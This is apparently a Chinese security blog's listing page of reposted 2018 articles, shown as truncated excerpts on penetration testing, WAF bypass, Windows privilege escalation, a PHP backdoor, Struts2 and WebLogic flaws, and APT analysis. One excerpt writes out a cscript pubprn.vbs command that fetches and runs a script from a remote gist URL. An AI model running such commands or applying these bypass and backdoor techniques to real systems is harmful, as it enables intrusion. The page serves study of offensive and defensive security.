攻破黑市之拿下吃鸡DNF等游戏钓鱼站群

前段时间有个网友给我发了个网址,说找到个专门做钓鱼网站的连接,让我看看,然后就引出了一系列事件。 网址如下:http://mfnyongshihuigui.jiebao8.top 当时也没在意,有天闲着无聊就开干了,直接打开 ji...

2018-05-30 17:05:05

阅读数:733

评论数:0

漫谈攻击链:从WebShell到域控的奇妙之旅

*本文作者:TimeS0ng,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。0×00. 引言做渗透测试时遇到的域环境经常就是要么太复杂我们搞不定,要么太简单进去就拿到域控...

2018-05-30 17:03:50

阅读数:180

评论数:0

ruadmin windows渗透

1 缘由 千辛万苦拿下的 webshell 不是 www-data 用户就是 networkservice 权限,要想拓展攻击面、扩大战果,提权,是必经之路,也是后渗透阶段成功的关键。windows 提权,常用手法包括搜寻本地明文密码、DB 命令执行提权、内核 exp 提权、dll 劫持提权、路径...

2018-05-30 17:02:35

阅读数:109

评论数:0

对股市骗子内部的一次apt测试

前不久,我被拉入一个所谓“牛股推荐”的QQ群,群里每天看到有人晒收益,说是群里某某老师推荐的。 ...

2018-05-30 16:41:59

阅读数:165

评论数:0

利用“进程注入”实现无文件复活 WebShell

* 本文作者:rebeyond,本文属FreeBuf原创奖励计划,未经许可禁止转载引子上周末,一个好兄弟找我说一个很重要的目标shell丢了,这个shell之前是通过一个S2代码执行的漏洞拿到的,现在漏洞还在,不过web目录全部不可写,问我有...

2018-05-30 16:33:39

阅读数:346

评论数:0

“围观”一个有趣的钓鱼样本

网络钓鱼可以说是一个老生常谈的话题了,但时至今日它仍受到许多攻击者的欢迎。比如一封邮件,一个附件,一个链接地址,再配上一段美丽陷阱的谎言。这看似老套,却让受害目标一次又一次的沦陷。在不久前,我提取到了一个非常好的样本,该样本将证明钓鱼攻击活动...

2018-05-28 02:18:42

阅读数:105

评论数:0

Nginx Lua WAF通用绕过方法

Author:JoyChouDate:20180517 一   、前言2018年4月3日@bre4k在群里发了一个trick。Nginx Lua获取参数时,默认获取前100个参数值,其余的将被丢弃。所以,用了Nginx Lua的WAF默认都会被Bypass。2018年4月20日,安全客上已经有人公...

2018-05-22 13:42:20

阅读数:189

评论数:0

web应用防火墙逃逸技术(一) web应用防火墙逃逸技术(二)

译文声明 本文是翻译文章,文章原作者,文章来源:https://medium.com/ 原文地址:https://medium.com/secjuice/waf-evasion-te...

2018-05-22 13:02:36

阅读数:209

评论数:0

如何利用Struts2漏洞绕过防火墙获取Root权限

本文我要分享的是关于Apache struts2 CVE-2013–2251漏洞的,由于该漏洞可以导致远程代码执行,曾一度被广泛滥用。该漏洞原理在于,通过操纵前缀为“action:”/”redirect:”/”redirectAction:”...

2018-05-22 12:24:10

阅读数:120

评论数:0

MySQL联合注入之绕过安全狗到GetShell

* 本文作者:心东,本文属FreeBuf原创奖励计划,未经许可禁止转载 发现网上公开过安全狗的方法少之又少,而且基本都是给个大概点就结束,本文章是将整个过程记录了一遍,因为一开始我也没想到我能成功的绕过去,大概过程是这样:Mysql基础必须要...

2018-05-22 11:47:31

阅读数:449

评论数:0

高收益的笨办法:暴破在Windows提权中的应用

* 本文作者:yangyangwithgnu,本文属FreeBuf原创奖励计划,未经许可禁止转载千辛万苦拿下的 webshell 不是 www-data 用户就是 networkservice 权限,要想拓展攻击面、扩大战果,提权,是必经之路...

2018-05-15 05:49:28

阅读数:342

评论数:1

Cloudfront劫持技术分析与介绍

近期,我一直在研究CloudFront域名劫持相关的问题。虽然这并不是一种新出现的安全问题,但其重要性显而易见:1.   CloudFront的某些默认行为不够直观,某些标准DNS配置会误导用户并让他们认为自己存在安全问题的域名已经配置正确了...

2018-05-15 05:46:29

阅读数:146

评论数:0

快讯 | Office 365中的0-day漏洞baseStriker出现在野利用实例

5 月 1 日,Avanan 的研究人员发现 Office 365 中出现了一个名为 baseStriker 的 0-day 漏洞。攻击者可利用这个漏洞发送恶意邮件,绕过 Office 365 的账户安全机制。baseStriker 漏洞的代...

2018-05-15 05:41:46

阅读数:114

评论数:0

挖洞经验 | 看我如何发现雅虎网站的3个RCE漏洞

今天我要分享的是,我参与雅虎(Yahoo)漏洞赏金项目发现的3个RCE漏洞。雅虎漏洞测试范围中涉及了很多服务应用,而我发现的漏洞就与雅虎的BrightRoll应用和中小企业服务相关。BrightRoll 是雅虎旗下的独立视频广告平台,可通过 ...

2018-05-15 05:39:49

阅读数:199

评论数:0

工具| Burp Suite API学习思路

Burp Suite是每个web安全学习者都接触过的集成平台,包含集合了多种渗透测试组件,除了强大的功能外,官方还提供API支持使用者开发插件,满足你独特的需求。 0×00 Burp Suite扩展模块斗哥这里从Burp的Extender(扩展)模块为出发点,讲述Burp的扩展开发,其它模块功...

2018-05-15 05:29:37

阅读数:239

评论数:0

搜索 JRMPClient2 CVE-2018-2628补丁绕过分析与修复建议

* 本文作者:sunyz2,本文属FreeBuf原创奖励计划,未经许可禁止转载一、漏洞背景Oracle官方在北京时间2018年4月18日凌晨发布了关键补丁更新,其中包含了OracleWebLogic Server的一个高危反序列化漏洞(CVE...

2018-05-15 05:19:59

阅读数:544

评论数:0

关于php对抗安全软件(总结)

目前日期为2018-05-10,php版本目前总共分为3大类,php5.x,php7.x,以及之php5.x之前版本。而目前市场多用于php5.x以及php7.x。本文仅讨论php5.x与php7.x。早期php4.x中 ZendEngine 1.0 API并不在讨论范围。文章将围绕几个话题来对抗...

2018-05-12 11:03:44

阅读数:113

评论数:0

PHP all kernel versions for backdoor

 所有Microdoor系列仅供学习,通过了解相关原理,来做自身安全与防护。切勿非法使用。Microdoor for php 作为backdoor,更为隐蔽,所有调用以及代码任意执行,都调用内核函数,php禁用执行函数依然可以执行任意php代码。无缝连接菜刀,以及第三方渗透框架。并且在phpinf...

2018-05-12 11:02:35

阅读数:76

评论数:0

Some Tricks -- WIndows下载东西

远程执行sct的另一种姿势1cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:https://gist.githubusercontent.com/enigma0x3/64...

2018-05-08 10:59:42

阅读数:124

评论数:0

海莲花APT组织最新攻击样本分析

0×1 概况 海莲花(OceanLotus)也叫APT32或APT-C-00,是一个长期针对中国及其他东亚国家(地区)政府、科研机构、海运企业等领域进行攻击的APT组织。近日腾讯御见威胁情报中心捕获到了一个该组织的最新攻击样本。在本次攻...

2018-05-08 10:32:33

阅读数:358

评论数:0

提示
确定要删除当前文章?
取消 删除
关闭
关闭